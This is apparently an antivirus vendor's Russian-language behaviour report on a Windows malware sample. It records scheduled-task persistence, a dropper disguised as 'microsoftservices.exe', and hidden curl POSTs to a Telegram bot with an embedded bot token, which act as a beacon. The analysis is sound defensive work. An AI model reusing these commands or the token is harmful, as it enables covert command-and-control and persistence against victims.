Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\system\systemcheck
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\adobe\flash player\microsoftservices.exe
- %TEMP%\systemcheck.xml
Сетевая активность
Подключается к
- 'ap#.##legram.org':443
UDP
- DNS ASK ap#.##legram.org
Другое
Создает и запускает на исполнение
- '%APPDATA%\adobe\flash player\microsoftservices.exe'
Запускает на исполнение
- '<SYSTEM32>\curl.exe' -s -X POST "https://api.telegram.org/bot7031438073:AAHCC-eiVlsUBvkBgzZgeJOcMUyd_ucM6U4/sendMessage" -d chat_id=1784151550 -d text="1" (со скрытым окном)
- '<SYSTEM32>\curl.exe' -s -X POST "https://api.telegram.org/bot7031438073:AAHCC-eiVlsUBvkBgzZgeJOcMUyd_ucM6U4/sendMessage" -d chat_id=1784151550 -d text="2" (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /create /f /tn "System\SystemCheck" /xml "%TEMP%\SystemCheck.xml" (со скрытым окном)
- '<SYSTEM32>\schtasks.exe' /run /tn "System\SystemCheck" (со скрытым окном)
